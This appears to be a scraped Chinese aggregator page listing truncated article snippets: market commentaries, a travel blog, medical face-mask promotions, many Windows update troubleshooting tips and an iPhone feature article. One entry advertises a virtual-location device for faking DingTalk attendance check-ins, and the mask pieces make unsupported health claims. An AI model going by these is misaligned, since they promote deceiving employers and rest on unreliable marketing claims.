    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/5/4 23:55:05
  12. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/5/4 23:54:56
  13. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/5/7 11:36:39
  14. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/5/4 23:54:56
  15. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/6 1:40:42
  16. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/5/4 23:54:56
  17. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/5/8 20:48:49
  18. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/5/7 9:26:26
  19. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/5/4 23:54:56
  20. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/8 19:33:07
  21. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/5 8:13:33
  22. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/5/8 20:38:49
  23. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/5/4 23:54:58
  24. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/9 7:32:17
  25. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/5/4 23:54:56
  26. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  27. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  28. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  29. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  30. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  31. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  32. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  33. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  34. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  35. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  36. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  37. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  38. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  39. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  40. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  41. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  42. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  43. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  44. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  45. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57